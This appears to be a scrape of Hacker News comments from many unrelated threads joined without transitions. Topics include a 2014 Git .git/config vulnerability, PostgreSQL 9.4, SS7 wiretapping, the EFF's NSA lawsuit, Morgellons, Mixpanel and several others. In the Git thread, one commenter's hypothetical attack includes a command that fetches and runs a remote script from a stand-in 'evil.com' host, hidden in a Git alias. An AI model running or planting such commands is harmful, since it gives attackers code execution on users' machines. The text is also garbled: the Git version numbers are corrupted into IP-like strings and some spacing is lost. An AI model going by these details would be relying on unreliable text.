Summary: on case-insensitive/normalizing filesystems (default on OSX and Windows) it's possible for .git/config to be overwritten by the tree, probably due to a case-sensitive sanity check when the actual file is insensitive. .git/config can contain arbitrary commands to be run on certain events/as aliases, so it leads to code execution. This is a risk when you get a tree from a third party, so on pull/fetch+checkout/clone...
There's an analogous vulnerability in Mercurial.
Update, then run git --version and make sure it's one of v220.127.116.11, v1.9.5, v2.0.5, v2.1.4, or v2.2.1. And be careful when pulling/cloning from third-parties.
EDIT: right, no "or", what are you doing reading this instead of updating?
(I am aware of all the - quite frankly ridiculous - complexity of Unicode characters that are visually identical and "should be treated as such for the purposes of comparison", but I think that's another example of excess complexity leading to things like directory-traversal attacks.)
brew update && brew upgrade git
Maybe alert banners aren't in the git-scm.com css template.
I always get a strange, uneasy feeiling when the tin foil hats turn out to be right.
I wonder if they are right on GPG, too. For those who don't know this: The OpenBSD people refuse to sign their releases with that "far too complex" GPG tool, but created their own lightweight "signify" tool instead. 
> A big "thanks!" for bringing this issue to us goes to our friends in the Mercurial land, namely, Matt Mackall and Augie Fackler.
It'd be interesting to hear how they came across this. Matt is the leader of the Mercurial project and Augie is a Mercurial core contributor.
This doesn't seem like a high priority upgrade since GitHub now blocks the vulnerability from being pushed to their servers.
edit: Upgrade ASAP!
The Git core team has announced maintenance releases for all current versions of Git (v18.104.22.168, v1.9.5, v2.0.5, v2.1.4, and v2.2.1).
I have one Windows machine and went to update http://git-scm.com/download/win (preview Version 1.9.4)
It was released 3 months ago, on 2014-09-29.
https://msysgit.github.io Version 1.9.5 preview BUT no documentation that this is for a security fix)
Doesn't seem like I can update my git client
Brian Harry's blog has more information and links to download URLs for the updates: http://blogs.msdn.com/b/bharry/archive/2014/12/18/git-vulner...
did they find any problems? The post doesn't say...
* create an alias which does something evil "curl evil.com/exploit.sh | bash;", maybe as a typo (commti?) since "to avoid confusion and troubles with script usage, aliases that hide existing Git commands are ignored"
* exploit code finds other local git repos and infects them (maybe avoiding those with github/bitbucket remotes, since they'll be blocked)
* be innocuous-looking via git config's "include", so the bad aliases aren't obviously visible looking at ~/.gitconfig
What about case-sensitive Mac file systems, like mine? I would imagine they are not vulnerable and that the author just overlooked this possibility in the article...
~ git --version git version 1.9.3 (Apple Git-50)
You could pull down git hooks that root your box, pretty intense hack, update now!
It seems like there are a lot of people who don't really pay attention to social media or other security alert channels, who won't have a clue about the extent of this vulnerability. I'm sure they'd update if they knew "if I clone a malicious repo, I'm toast," but there's no way to inform them except by HN/Twitter/Reddit/mailing lists.
One could argue that they get what they deserve for being uninformed, but it seems like the ethical obligation might actually be on us to develop tools that ping home and ask whether it needs to stop working until it's updated.
Actually, I'm not sure it's ethical to embed such shutdown behavior into a tool that needs to be reliable. Maybe just a scary warning message like "This version is critically vulnerable, update immediately" every time the program runs would suffice.
It's not just the database itself (and that's awesome on its own right), but it's also all the peripheral stuff: The documentation is seriously amazing and very complete, the tools that come with the database are really good too (like psql which I still prefer to the various UIs out there).
Code-wise, I would recommend anybody to have a look at their git repo and the way how they write commit-messages: They are a pleasure to read and really explain what's going on. If everybody wrote commit messages like this, we'd be in a much better place what code-archeology is concerned.
Patches from the community are always patiently reviewed and, contrary to many other projects, even new contributors are not really required to have a thick skin nor flame retardant suits. The only thing required is a lot of patience as the level of quality required for a patch to go in is very, very high.
Finally, there's #postgresql on Freenode where core developers spend their time patiently helping people in need of support. Some questions could be solved by spending 30 seconds in the (as I said: excellent) manual and some of them point to really obscure issues, but no matter what time it is: Somebody in #postgresql is there to help you.
I think there's no other free software project out there that just gets everything right: Very friendly community, awesome documentation, awesome tools, and of course and awesome product offering to begin with.
Huge thanks to everybody involved.
Also: Huge YAY for jsonb - I have many, many things in mind I can use that for and I have been looking forward to this for a year now.
PLV8 is such a natural fit with the new JSON(B) types that it's probably going to become the most used extension with that data type... And imho sorely missing from the out of the box experience. I'm glad that they've concentrated on getting the data structure and storage right first. Hopefully we'll see this in vNext.
As to replication, I understand that this is part of EnterpriseDB's business model, just the same not having the basic replication pieces baked in, is still lacking compared to other databases. Even if the graphical tooling was commercial only, and all the knob frobbing via config or command line is more complex, having it in the box is a must imho. I actually really like how MongoDB handles their replica sets, and where RethinkDB is going with this as well. Though they aren't transactional SQL databases primarily, it's a must have feature these days. Replication with automagic failover is a feature that has gone past enterprise-only.
All the same, thanks for all of your hard work, and I look forward to the future of PostgreSQL.
Microsoft tentatively seems to be settling on them as the preferred RDBMS for non-Windows platforms :
> Within ASP.NET 5 our primary focus is on SQL Server, and then PostgreSQL to support the standard Mac/Linux environment.
I use EF+SQL Server and they're very much complementary and provide an excellent developer experience. NHibernate+SQL Server is woeful unless you want to use the loosely-typed Criteria stuff. NH's LINQ provider is terrible and it gets confused at the drop of a hat (call Distinct and then OrderBy? "I'm sorry Dave, I'm afraid I can't do that"). At this point I'm convinced only MS know how to write LINQ providers that won't fall over the moment you try to do something useful with them.
Microsoft writing a LINQ provider for PgSql is a great thing for running .NET code on non-Windows platforms.
They are also clearly reaping the benefits of some very smart architectural decisions, and that gives me the confidence that they will be able to continue innovating in the coming years.
We're just getting into PG now, and it's just really nice to set up and use. I really wish more web stuff properly supported PG and didn't pretty much require MySQL.
That article was written before JSON/JSONB showed up, but the idea remains the same.
I didn't have plv8 installed, so I did some plumbing code in plpython. plv8 would be more suitable though.
It might go against the "no transaction" crowd, but seems useful for performance-critical needs. I'm scheduling a bit of testing time with it next week to see if it's something I'd roll out in production (Maria 10 system)
I'm newer to Postgres so am not sure. Replica Sets are the killer feature for me, more so than just storing JSON documents. I'd appreciate if someone can chime in. I've done some googling but there seem to be multiple strategies for replication.
My favourite parts:
Allow views to be automatically updated even if they contain some non-updatable columns
Allow control over whether INSERTs and UPDATEs can add rows to an auto-updatable view that would not appear in the view. This is controlled with the new CREATE VIEW clause WITH CHECK OPTION.
Allow security barrier views to be automatically updatable
Is attribute order stable? Obviously, order is not preserved, but if the order changes on subsequent accesses, this causes problems if you ever serve content directly from a jsonb field without sorting the attributes manually.
Are there any code examples (preferably Python) that show how to use JSONB? I'd love to see some examples on how to query every record that contains a key in a json, or order rows based on a value in a json object.
off topic: If Meteor.js implements PostgreSQL 9.4 I would seriously consider using it again. That and maybe make DDP scalable.
I don't know what authentication is required. I expect that it was designed so that only your cell carrier could enable it, however whatever may have been secret about it, quite likely has leaked out by now.
If you don't want to be listened-to, don't have _any_ cell phones anywhere near you. Not just your own - say you want a private conversation in a public place; the phones of other people in your general vicinity could be switched on to listen to you.
I learned this from a well-known left-wing radical organization known as the United States Air Force, when I applied for the USAF Cyber Command. Their site had a recruiting video, that depicted a couple officers locking their phones into a grounded metal box - a faraday cage - before entering a secure area, that is, a room where secrets were openly discussed.
The main function of SS7 is call setup. All the switches along the route get their switching commands over SS7, not over the circuit-switched channel. (That went out with SS5, the old audio-tone based system). Call setup is preceded by "translation", turning a destination phone number into a route. That's done with query messages over SS7.
This allows outsourced wiretapping. Verisign offers this as a service for telcos, so they don't have to deal with law enforcement themselves.
Verisign, which also runs much of the US SS7 network (http://www.verisign.com/stellent/groups/public/documents/dat...) is well placed to do this. All they have to do for a wiretap is to have the translations for a source or destination number reroute to a wiretap point, which then records while forwarding to the desired destination. As an SS7 provider, they already have all the call metadata.
Vulnerabilities come in because more parties now have SS7 access. Cellular roaming and VoIP to landline routing are managed over SS7. So a large number of computers other than dedicated telco switches now have SS7 connections. A break-in at any of those points has wiretapping potential.
1. Alexandria needs to communicate with Bilbo. Alexandria has the privilege of being trusted by whatever organization she belongs to (be that her country, company, etc) and as such is unmonitored AFAsheKs. Biblo on the other hand is some fugitive-type and is unable, or perhaps unwilling, to enter direct communication with Alexandria for fear of compromising himself or his beloved Alexandria. Bilbo could then monitor Alexandria's calls for an encoded message via a protocol they predetermine. This protocol could take the form of linguistic or audio steganography. One could image all sorts of information being leaked by Alexandria.
2. More realistically this could be tool for bribery. Monitor a set of vulnerable targets, wait until they reveal something, take a bribe to stay quite.
3. Or, for the Machiavellian-minded leak information that was supposedly confidential between two parties.
Edit: phones are forbidden due to the recent spying events.
The hack of belgium telco Belgacom sees more light day by day.
This system is broken beyond repair. We need to build it up from the ground, safe.
The 3G/4G segment of subscribers will have a distribution of 3.4 billion using 3G (SS7) services and .9 billion using 4G services. The total outcome of this research indicates that a total of 7.65 billion subscribers, out of a total of 8.5 billion subscribers, will remain on SS7-based networks in 2017.
Verizon went on to further explain that a final 2G/3G (SS7) sunset timeframe decision has not been made.
The good news is vendors are not happy considering the availability of hardware is will decrease significantly over the same time period, hopefully speeding the sunset for this technology.
Some service providers are planning on a strategy of consolidating their network, having no support and cannibalizing existing spare equipment for hardware support.
If you are in the bay area, I highly encourage you to go (this one is very near the Oakland 12th St BART). You are watching history in the making.
And select EFF as your Smile charity. THEN get the browser extension to automatically redirect you to the Smile link:
EDIT: I only use the chrome extension, if someone has a better FF extension just let me know and I'll change the link, that was the first one I found.
Love it. I hadn't thought of it like that before. Just because your search is fast doesn't mean it's not a search.
>Jewel was filed in 2008 on behalf of San Francisco Bay Area resident Carolyn Jewel and other AT&T customers.
This isn't a new lawsuit, it has just taken forever to even get to this point. The main focus of this case isn't from the Snowden documents but the Snowden documents did open up the case to actually go forward without State Secrets censorship.
However, if we don't help US citizen for their democracy, we'll have no weight for ours.
Let them know we won't accept the status quo.
As noted above, however, all upstream collection of which about collection is asubset is selector-based, i.e., based on . . . things like phone numbers or emails. Justas in PRISM collection, a selector used as a basis for upstream collection is not a keywordor particular term (e.g., nuclear or bomb) but must be a specific communicationsidentifier (e.g., email address). In other words, the governments collection devices arenot searching for references to particular topics or ideas, but only for references to specificcommunications selectors used by people who have been targeted under Section 702.
In other words, the NSA is searching for the communications of specific people - it's targeted collection. The EFF itself even concedes that they are filtering out wholly domestic communications. Instead of questioning the specific procedures for targeting these people, the likelihood that they may fail and collect an innocent bystander's communications, the procedures dealing with incidental or accidental collection, etc., they are instead taking the stance that the filtering itself is illegal because a packet filter needs to see a packet before determining whether or not it matches the specific communication. As an analogy, if where to pull up my terminal and run:
$ seq 1 3 | grep -v 2 | grep 3 > out.txt
I think I see why the EFF is making that argument: in Clapper v. Amnesty International it was ruled that the plaintiff didn't have standing because they couldn't show that their specific communications had been collected. Jewel v. NSA would likely have the same issue, so to get around it the EFF is instead arguing that the very fact that the NSA is conducting any sort of packet filtering itself constitutes a search and seizure, regardless what safeguards are put in place or whether the filtering is targeted. I think they're grasping for straws with this one - I'd be really surprised if they win. If I were in their place, I'd probably FOIA the hell out of the 702 procedures and look for loopholes instead.
The court thus faulted them [the ACLU in ACLU v. NSA, 493 F.3d 644, 648] for assert[ing] a mere belief that the NSA eavesdropped on their communications without warrants. Id. This failure of proof doomed standing. Ultimately Jewel may face similar procedural, evidentiary and substantive barriers as the plaintiffs in ACLU, but, at this initial pleading stage, the allegations are deemed true and are presumed to embrace the specific facts needed to sustain the complaint. 
EFF is on a fishing expedition. I am not unsympathetic. But this judicial arm-twisting and absurd twisting of language / law needs to stop as the road it opens is not helpful to our democracy. They will never be able to justify their claims with anything that will pass evidentiary muster.
Supporting the EFF is all fine but generally a waste of time and money for effecting real change. The only way these programs end is if Congress is full of people who want this to stop and will ensure that it does.
If an obscure libertarian like Grover Norquist can dominate electoral cycles with a "Taxpayer Protection Pledge" why can someone not similarly dominate electoral cycles with a "Privacy Protection Pledge"? Demand every presidential candidate sign it, etc. Make it a real wedge issue.
I wonder if the answer is that US citizens don't care because they don't really see how they are harmed? They believe the Govt is protecting them by doing this?
: http://cdn.ca9.uscourts.gov/datastore/opinions/2011/12/29/10... [pdf]
Fucking unhelpful to frame mental illness like this.
It is intensely frustrating to see people suffering - to the point where they consider suicide - because of the stigma around mental illness.
Everybody gets small phantom itches from time to time. I think the idea of an "itch nerve malfunction" makes the most sense. One could imagine some sort of infinite loop of itch nerves triggering each other, exacerbated by constant scratching.
Any strange psychological behavior, such as extreme cleanliness, or being convinced that ordinary clothing fibers are the cause, would be an obvious natural response if you couldn't figure out why you were suddenly so itchy.
Also, anyone who has to deal with contact lenses knows that our hands and fingers always have tiny little fibers stuck to them.
You can see an extreme example of this itching in alcohol and benzodiazepine withdrawal - apparently it causes feelings of your skin crawling.
I don't really have anything interesting to add to the discussion, just that it's difficult to see a relative suffer like that.
Another problem with phantom feelings are that they can overlap with actual feelings. That means the brain feels itch on hand, for example, and scratching of that part triggers a relief response. This not only temporarily "fixes" the itch, but also strengthens the belief that the itch is real. After countless of these confirmations it can become near impossible to convince yourself that it is not real.
Now the relation to the story about Morgellons. Bed bug bites can be extremely itchy and cause large welts on some people (not everyone as it is an allergic reaction). This was true in my case. The welts tended to be about the side of a silver dollar and last for about a week before subsiding.
We had contracted the bed bugs at a house party we had attended where I had gotten a few bites. We assume they were mosquito bites and didn't think another thing about them. About 2 weeks after that I started getting bites while I was sleeping. Never having been exposed to bed bugs I first assumed mosquito bites or perhaps spider bites. Neither of these cases turned out to be true.
After two more weeks I began to feel very crazy for lack of a better word. The itching from the bites was driving me wild and we could not figure out what was biting me. (The infestation was never a large one, most likely it started from a single insect). I went to the student health clinic (we were graduate students at the time). They concluded bug bites but we were not sure because we could not find any bugs!
I made an appointment with a private dermatologist. Now, before I got in to see him we did more research. We did turn up bed bugs as a possibility and we looked but not throughly enough and found nothing. (It turns out they are very very good at hiding). The research turned up all kinds of crazy things like the Morgellons disease and various mite related infestations, such as Bird Mites. Having a bird we became alarmed at that particular possibility as bird mites are tiny and very difficult to get rid of.
The internet research made my psychological condition rapidly deteriorate. I worried constantly about the different possibilities. It effect my ability to do research. It affected my ability to properly TA. I was becoming psychotic in my search for the causing the itching that would not cease.
Finally, I got the private dermatologist. He suggested bed bugs and told us to search again. This time, the infestation had grown and we found them. It was such a relief to know the cause.
However, the cure is neither fast nor simple nor cheap for bed bugs. Insecticides are ineffective as they only eat mammalian blood and the most effect insecticides these days need to be ingested by the organism. The most effect thing is physical removal of the insects, their eggs, and their larva. The eggs and larva are tiny and it takes very careful searching to find and clean them all.
We spent every night for months search with magnifying glasses and powerful flash lights while washing and drying our bedding (heat treatment (or cold) is the only sure fire solution to bed bugs). It took many months but eventually we found them all and with the help the pest man's insecticides prevented the infestation from growing out of control. Needless to say we moved and bought a new bed when our lease was up!
Even today years later, I still fear unexplained itching. It think that for me, I could have developed a psychosis where I believe I am being bitting by invisible bugs if we had not found the infestation. It took a long time for my mental state to recover and if it had gone on for 6, 12 months of unexplained bites and itching I may have become very unstable. Itching is very difficult to deal with.
I hope that someone can help these people find an effective way for them individually to deal with the itching even if for some it is only in their minds.
I've been playing with Smalltalk recently, and it's really interesting as an environment. It has a number of RAD tools built in - the flexible Morphic GUI, the image system allowing you to store state without explicitly dealing with a database, and being able to develop from the same environment that your code runs in, allowing quick turn-around in adding and testing features - and I'm wondering why it's not used more often for line-of-business applications.
I'm not going to say their deck doesn't have value, but I will say it doesn't seem like it has much of one. Maybe that's the point.
Take note of a few things:
* They don't use BS "corporate speak" -- no synergies of optimizing user solution metric analysis.
* There's no fluff. Just, none. Problem. Solution. How We're Doing. Why We're Better. What We Want To Do. The Landscape.
And it worked. This should be the baseline for every pitch deck.
Seems being concise, using facts and getting to the point quickly is the way to go. I've seen a lot of companies who go as far as creating pitch videos with fancy production, graphics, voiceovers and a soundtrack to try and use fancy visuals to get funding.
Congratulations on the recent funding round. You have a great product Mixpanel.
I wonder how much of their MRR X 12 months is multiplied by to reach $865M valuation.
AVG MRR X 12 X ?? = $865,000,000
Is it 100 ($8.6m ARR) ?Is it 50 ($17.2m ARR) ?Is it 25 ($34.4m ARR) ?
What is the average valuation multiple for SaaS? Is it higher or lower than other Startup models (consumer, yearly subscription)?
If one was to replicate a similar valuation with their SaaS what would it take?
Something went wrong. Try another search term?
Simple and to the point, then moving onwards to the next query. This engine is next level.
From Smash Mouth to cryptography and signet rings.
From what I can tell: "Fush Yu Mang" was an album, albums were once made as LPs, which were developed by Western Electric, which was an appendage of AT&T back during the Ma Bell ("We don't care. We dont have to. We're The Phone Company.") days, which had a statue called The Spirit of Communication at its 195 Broadway location, which jumps directly to AUTODIN for some reason (195 Broadway was owned by Western Union... ?), which leads to leased lines, which leads to OSI, PKI, csexps, digital signatures, and signet rings.
It's like when I take too much caffeine.
>>> Many types of aquatic animals commonly referred to as "fish" are not fish in the sense given above; examples include shellfish, cuttlefish, starfish, crayfish and jellyfish.>>The End
It generally has a pale yellow color, but varies from deep yellow to nearly white.
In telecommunication and radio communication, spread-spectrum techniques are methods by which a signal (e.g.
"The first large proton synchrotron was the Cosmotron at Brookhaven National Laboratory, which accelerated protons to about 3 GeV (19531968)."
"The stated purpose of the one-party state was to ensure that capitalist exploitation would not return to the Soviet Union and that the principles of Democratic Centralism would be most effective in representing the people's will in a practical manner."
Absolutely amazing and chilling at the same time. I typed in "sex" and had 1 minute of free time. It seemed coherent but the subject matter seemed to drift far away. Some tweaking and it would be very convincing.
I'll go out on a limb and say that if this pattern continues, it may be the most significant legacy of heartbleed.
There are plenty of apps that provide varying levels of window-manager functionality to OS X. I would try a couple out and see which feels right to you. I have tried most of them, and personally prefer Moom.
Amethyst tries to bring the XMonad experience to OSX. I think it does an admirable job, but there are some distinctions. Amethyst is simpler to set up, and is more forgiving to newcomers. It has a GUI for configuration, and an easily accessible list of commands. It also works on top of OSX's WM, so it's not so enormous a departure, especially compared to XMonad's fairly extreme dismissal of the mouse.
On the down side, XMonad really outshines Amethyst when it comes to performance. Amethyst is downright sluggish, where I've always found XMonad to be very responsive. Still, it's overall a true enough translation, and the sluggishness rarely actually hinders productivity. Overally, I think Amethyst is a capable daily driver, and a great intro to tiled window managers.
I've been told focus follows mouse was impossible on OS X.
At the moment, I'm using Spectacle for OSX. http://spectacleapp.com/. Are there reasons I should use Amethyst instead? I'd love to see a feature matrix or something in you FAQ about the other options, and what Amethyst brings to the table.
I've noticed it gets a little slow to rearrange things sometimes with lots of windows but the functionality I need is all there.
Works great with my three screen setup too, which many tools like this don't.
I, maybe, have one or two apps sharing a single workspace. Most apps are in full screen.
I'm asking this question because I'm quite comfortable with SizeUp and don't understand if learning how to use a WM is worth it.
Not really family/adoption:
To be honest, the whole history of the Houshi family is kind of a mistery. There was no real documentation in paper back then. No photos, and paintings or such were only for rich people. Yet, the whole town kinda grew around the hot springs and this one hotel in particular. So the history of the hotel and the family is very much connected with the history of the town. That's also where the proof for the Guinness Bureau came from. They wouldn't just accept them saying "yea, we old."
What changed in 2011:An even older hotel submitted their application.
Also: as far as I found out, that older hotel is not a straight "same-family" business, or at least not anymore. I'm a bit sceptical of that posted source below. There's an association for family businesses older than 200 years AND still running, and that hotel is not part of that, Houshi is.
The daughters motivation:I shot this film over the course of six days, in April and in June. When I was doing the interviews in April, the daughter didn't actually know that her father decided that she should take over. I was the one who told her during the interview (assuming then she was aware of it of course). She officially started in May, and when I came back in June, she was much more adjusted. She's actually doing pretty well. There's also a second son, even working in the hotel, longer than the daughter. but according to the father, he's not smart enough to manage the inn. The daughter is actually much stronger and smarter than she thinks she is. That's why the father chose her. In 1,300 years, no woman was the official owner of the inn. However, they were allowed to be "temporary owners" until the son came of age or someone was adopted. Yet, the father considers giving the daughter now the title of Zengoro. She would be the first woman in 1,300 years to wear that title. But it's not final yet. I consider going back there in a couple of years to see what's changed.
The first born son gets trained from day one to become the owner. The daughter wasn't properly prepared. Yet, she loves her family dearly and is caught between her love, obligation and duty. For someone carrying the weight of 1,300 years and 46 generations, she is doing remarkably well.
Rates start from Y9900/person (~US$83) for a midweek stay with two meals, although better rooms and meals can cost considerably more.
Reviews seem a bit mediocre though: this is a large ryokan geared for large groups, and not particularly luxurious as far as these things go.
I always wondered what would be morally just position on such long standing establishments when it comes to inheritance of responsibility.
On the one hand kids of such family shouldn't be tied to the family business if they don't find it fulfilling. On the other hand if they won't continue the line traditions might die and with them such old an interesting places as this one or any other.
But as datamatt writes, I guess adult adoption does help with that. If kids in such family feel that they are not up to the task, their parents can adopt a person (a man in this case) who will continue with this tradition.
I wondered what happened in 2011
As someone else pointed out, the daughter seems to be sad. I hope she is able to find someone to make her happy and is able to let her do what makes her happy.
The selection is pretty decent, definitely comparable to Google Shopping Express.
One very odd note though: they ask for a variable tip to the delivery courier (something Google doesn't do). So even for "free" 2 hour delivery, you're paying for delivery. While I see how this is better for the courier, I think it's a big mistakepeople hate navigating the social dilemma of how to tip properly, and solving social dilemmas is a key advantage of digital services.
Now, for prime members in NYC at least, Amazon is a viable option.
What other moats do local stores have? Amazon wins on:
* selection * cost * convenience * reputation * knowledge (this depends on the local store)
* feel good factor (supporting local business and employment) * hold the item in your hand (not sure there is one word for it in English, but the Germans probably have one)
* I need it now
Amazon has been building warehouses all across the country near cities to reduce shipping times. But the retailers already have what amounts to hundreds of warehouses at every population center, plus the inventory management systems. Why haven't they put their inventories online and offered same day delivery to neutralize Amazon?
(if you don't remember Kozmo, this was done by a reporter during the last dotcom boom/bust as a joke)
And how about returns? Can I return stuff in one hour too?
Very interesting how ideas from the first bubble re: brick-and-mortar are coming back.
Submitted here, to get a wider audience, and ask: does anything in Rust preclude this from being done in Rust rather than OCaml? Sounds like a nice idea...
Some of these -- the domains for the federal government's executive branch -- were already public. This includes the rest of the federal government (e.g. Congress, the courts), as well as all the .gov's in states, territories, counties, cities, and native tribes.
There's about 5,300 of them.
However, I do appreciate the transparency.
I guess some of the interesting things you might be able to do include analyzations like!) What states counties have more .gov websites for their municipal functions2) What states counties have the most disparity in municipal function websites
There's probably some interesting things you could ascertain from this data set given a weekend and some drive.
He found and ran a lean organization on grit and triftiness when toyota production system was taking it's baby steps in japan.
I heartily suggest Ben Rich's 'Skunk works' to anyone who gets a kick out of a true story what it actually means in terms of output when an innovative engineering team actually works lean... in hardware.
The lack of this is the #1 problem with professional software engineering.
any examples out there?
I noticed they mentioned Heap Analytics (https://heapanalytics.com/) as one of their competitors. We've been using Heap for over a year and it seems like the logical and magical next step in analytics. Mixpanel gave you smarter analytics on things you had the foresight to track, but Heap automatically tracks everything from the day you integrate it. That means you can get smart analytics even on things you didn't have the clairvoyance to start tracking 6 months ago, or didn't have the resources to insert tracking code in.
For startups, Heap's automatic and retroactive tracking is huge. It means we can iterate on product features and marketing/outreach schemes way more quickly while still getting insight into what's successful and what's not. It's not perfect--a couple times we've added special class names to our HTML elements so Heap can distinguish them, but that's still easier than adding manual tracking code--but it's a huge improvement over the old way.
I noticed Heap has a page comparing themselves with Mixpanel (https://heapanalytics.com/compare/heap-vs-mixpanel) but I don't see anything similar from Mixpanel's POV. I'd be curious to hear what Mixpanel's plans are in this area (automatic/retroactive tracking).
These are questions for the business, but I feel like Mixpanel could add so much more context. "We noticed that 'time to first interaction' has gone down with 'watched home page video'." That would at least be a clue.
MP has the data, but all of that analysis is manual (or was, last time I used it).
I believe the main reason why there's less women in tech is because there's less women in tech(!) It's really hard to jump in a new field where you're the extreme minority. Just as a crude example, imagine getting into nursing school as a guy. That would take a lot of guts. I know because I have a friend who did it and you can easily imagine the kind of comments he's getting all the time from families, strangers, administrators, etc. However, if there were more guys in nursing, it wouldn't be as hard.
You can also think about being gay in San-Francisco right now vs 50 years ago. Yes, a lot of things changed, but part of the reason why it's getting much better is because there simply are more gays, you know you're not alone.
I'm not sure if this was a good example. But women in tech are a bit similar. It's hard to jump in when you're the minority. It's much easier to take the easy route and get a profession where there's already a good ratio of men/women.
Why am I saying all this? Because I think women-only events help girls looking to move into tech understand that there actually are women in tech. If we'd only have mixed-in events, the few women in the crowd would easily be missed by the overwhelming majority of guys.
Someone also posted something about Black, Latino/Hispanic Founders. That's extremely related. A black friend of mine told me that one of the hardest thing about being black in the tech community is that he's almost always the only one. It takes a lot of guts to be the only different one in the room. Some people like that, but for lots of people it's hard. Personally, as an introvert, I'd hate to have everyone in the room looking at me the second I enter the room, all the time.
Though I'd definitely learn a lot at this conference, I'm not going toapply for an invitation because I'd rather see the limited invitationsgo to people who can make the most of them. I'm not founder material, soI should wait until the videos get released. If I was mistakenly givenan invitation, I'd politely and humorously report it as a bug in theiroptimization algorithms. ;-)
HN users tptacek and cpercival are known representatives of a specificminority in tech, namely, people with a reasonable grasp of crypto. Ifthere was a specialized conference of this crypto-cogent minority, thepeople who would gain the most from the conference are either alreadycrypto-cogent, or are considering becoming crypto-cogent. The rest of uscrypto-ignorant people (myself included as an admitted crypto-failure)are much better off always trying to learn from the experiences theygenerously share. If the title of this story was, "Crypto Conference2015 Applications Are Open," I'd like to believe people on HN would notbe arguing whether specialized cryptography conferences should exist.
All conferences are specialized in some sense. Learning from the uniqueperspectives and experiences of said specialization is one of the mainreasons for going to any conference. The other reason is networking withyour peers. The specialization can be a field, topic, group, or someother commonality. In this case, the specialization is Female Foundersand the chance to learn from them is a fantastic but rare opportunity.The same is true for any specialized group of notable people speaking ontopics where they have the benefit of experience and perspective.
My challenge to you, the regular HN user, is can you tell me somethinginteresting about the accomplishments of any of the speakers?
I'll start. Jessica Livingston wrote a book called "Founders At Work"and it's one of my absolute favorites. I've nearly broken the binding onmy copy with all the sticky-note page markers. Though my server willprobably melt from the load, proof of my assertion is available .
Many folks might (mistakenly) see them as an admission that women can't hack it on a level playing field. Such thoughts would only serve to harden their chauvinistic mental models and cause gender discrimination to be more (rather than less) likely in the future.
I wanted to track my heart rate while I run. I didn't want to let a large company have direct access to my health information.
This is gold :) Nice write-up, Jeff.
So I'll just post a couple notes:
* auth appears to be using OAuth WRAP (deprecated as a spec, but Microsoft appears to use it for Live logins), so I'm sure could be pretty easily extracted for an API library
* As mentioned the API mostly talks to an endpoint on and the returns are gzipped JSON except for a PUT to prodwus0sts.blob.core.windows.net for the binary log of your actual data (there's a subsequent PUT that then sends the UploadId and some other metadata to the API server)
People have mentioned wanting to avoid sending your data to the cloud completely, and that should be completely possible. The easy way atm is that you could just mitm the endpoints and sync as normal w/ the app.
However, there are at least a couple of people that have successfully reverse-engineered the BTLE protocol, although I haven't seen anything fully published yet. This appears to mostly/primarly be based on digging through the Windows client's DLL.
Pic of source w/ some of the BT protocol:https://twitter.com/JustinAngel/status/527955001436418048
Some BT functions:https://twitter.com/JustinAngel/status/528383467742957571
Methods extracted from the dll:https://twitter.com/JustinAngel/status/529876592479047682
(On OSX, strings gives you significantly less useful information, although apparently it was built by 'ianhowle' and there's a native Objective-C "CargoKit" library)
Note, there's one open source project that has theming and plans on building live sensor output: http://unband.nachmore.com/
And there's a closed source phone already that does access all the sensor data in realtime: http://www.windowsphone.com/en-us/store/app/band-sensor-moni...
I'm not too familiar with Windows Phone, but I believe you can access and decompile an unencrypted XAP if you have a rooted Windows Phone to see what it's doing.
I don't really have much experience/use/access to Windows stuff in general, but for someone w/ that kind of experience, I can't imagine it being very hard to deconstruct.
That said, this is awesome. I just think that there are pros and cons to both and we shouldn't be focused only on 3D printing.
Seems like using this manufacturing approach would be a very tough sell for any real mission.
Only benefit of 3D printing at your destination is the ability to manufacture something that was overlooked, so contingency planning. (yea, yea, someday we'll mine the printable materials on site, right...)
For just about any other item that you know you need, it would be much more weight-effective (the golden measure in launch considerations) to just build the part here on earth, where you can maximize specific density and specific strength using materials that 3D printing can't touch. Plus you aren't lugging around a heavy 3D printer + raw materials.
As an engineer my first thought when I saw what it printed was how do you turn a bolt with a plastic wrench without breaking the wrench?
- https://gigaom.com/2014/12/18/baidu-claims-deep-learning-bre...- http://www.forbes.com/sites/roberthof/2014/12/18/baidu-annou...
Breaking the network up like this would reduce training time and perhaps reduce the needed training data. Since the first layers could be trained without supervision, less labeled data would be needed to train the last two layers. It would also facilitate transferring models between problems; the output of the first few layers, like a word2vec, could be fed into arbitrary other machine learning problems, e.g., translation.
If this does not work, then how about training the whole model together, but only once? The final results are reported for an ensemble of six independently trained networks. What if started by training one network, and then fixed the first three layers to train other networks? (Instead of fixing the first layers, you could also just give them a slower training rate, although it isn't clear whether that would save you much.)
Congrats to Carl, Sanjeev, Andrew, and the others.
This is still very cool, but that comparison doesn't seem fair at all.
Oct 5: Steve Jobs dies
One kind of side note. On October 5th, Steve Jobs died. He had been involved in a lot of the process leading up to it. We know that he was watching this launch from his house. I don't know what he thought about it, but I like to project that he saw it, said "It is good. This is the future, Apple's in the middle of it. I can go now." I don't know if that's true, but that's a projection that I like to put onto it.
Walking backward in time, Adam discussed the technical history of Siri as well as how the vision of virtual personal assistants evolved over time. He wowed the audience with a video from 1987 on a concept from Apple where predicted a Siri like device 24 years in the future and was only off by 2 weeks.
Is this only me? I'm not blocking cookies or anything like that.
I note that the lead author of the study, Linda E. Carlson, is part of a group of cancer researchers promoting "integrative" approaches to cancer treatment. Another cancer researcher commenting on this approach thinks that "integrative" cancer therapy so far promises much more than it can actually deliver in improved patient outcomes. The original headline of the Fast Company article submitted here, already changed by the Hacker News moderation team, is surely wrong, and it's not at all clear that this extraordinary claim will replicate if an independent group of researchers attempt to replicate the results. If I or any of my loved ones should happen to have a case of cancer (which is rather rare in my family), I will ask for advice on how to treat it from a doctor who practices science-based medicine.
this is a crummy article with a crummy headline about one single study which may or may not also be crummy
Exposure to radiation can change your DNA.
Heck, everything can change (read mutate) your DNA.
They'll see a highlighted word or sentence with a bold font, wider spacing and a blue background. So they set the background blue, the font bold and the spacing wider. But really, the editor should provide an intuitive way to apply the <span class="highlight"> element.
Some editors out there do this, but they generally suck in other areas. Wysihtml seems to apply inline CSS. Can it easily apply a class too?
The Voog team
We have so many choices when it comes to WYSIWYG. My favorite is https://github.com/daviferreira/medium-editor.
I can do paragraphs by not manually breaking lines and instead select the second paragraph's content, then apply the "normal text" style, but this isn't exactly intuitive.
Or one could disallow further linebreaks and thus just create paragraphs when you're entering a linebreak.
This implies it isn't configurable and unfortunately - in my view this is the incorrect direction to unify in.
Hasn't even MS Word nowadays standardized on Enter=paragraph break, Shift+Enter=line break
